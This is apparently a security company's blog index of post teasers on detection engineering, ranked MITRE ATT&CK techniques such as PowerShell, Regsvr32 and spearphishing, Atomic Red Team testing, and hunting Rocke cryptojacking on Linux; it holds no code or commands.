Meet Todd Gaiser: detection engineering extraordinaire

Todd Gaiser is a longtime anti-malware enthusiast, a vintner (in a manner of speaking), and the new director of detection engineering at Red Canary.

FrameworkPOS and the adequate persistent threat

A lot is made of so-called “advanced persistent threats,” but, oftentimes, good enough is good enough—even among sophisticated adversaries.

Adversaries use scripting more than any ATT&CK technique except PowerShell

Scripts provide a versatile mechanism for automating task execution at nearly every phase of an attack. The only real limit on what can be achieved with scripting—whether malicious or legitimate—is your imagination. So it makes perfect sense that scripting (T1064) is the second most prevalent MITRE ATT&CK™ technique among confirmed threats in the environments we monitor.

Four tools to consider if you’re adopting ATT&CK

These four tools are easy to implement, compatible with MITRE ATT&CK, and free, which is why we recommend them to anyone adopting the framework.

Threat analysis: Regsvr32 is the third most popular ATT&CK technique

Trusted by default and not easily disabled, Regsvr32 (T1117) is a favorite technique among adversaries. Both stealthy and practical, it can be used to perform a variety of malicious actions that are difficult to detect or block. All in all, it’s no surprise that we see it so frequently in the environments we monitor.

Connection Proxy Ranks Fourth Among ATT&CK Techniques

Testing the Top MITRE ATT&CK Techniques: PowerShell, Scripting, Regsvr32

In this blog, we’re going to walk you through some Atomic Red Team tests that you can run to emulate adversaries and confirm that you are able to detect the types of ATT&CK techniques that have been most prevalent in the environments we monitor.

Spearphishing Ranks Fifth Among ATT&CK Techniques

We’re counting down the top 5 MITRE ATT&CK Techniques according to confirmed threats in the environments we monitor. Number 5 is Spearphishing Attachments.

Threat Hunting in Linux for Indicators of Rocke Cryptojacking

Rocke is a threat actor known for mining cryptocurrency on Linux machines, but it also persists, disables security software, moves laterally, and more.

Getting Started with ATT&CK? New Report Suggests Prioritizing PowerShell

In a newly released report spanning nearly five years and examining some 10,000 confirmed threats, we revealed that PowerShell (T1086) is—by a wide margin—the most prevalent MITRE ATT&CK™ technique that we’ve observed.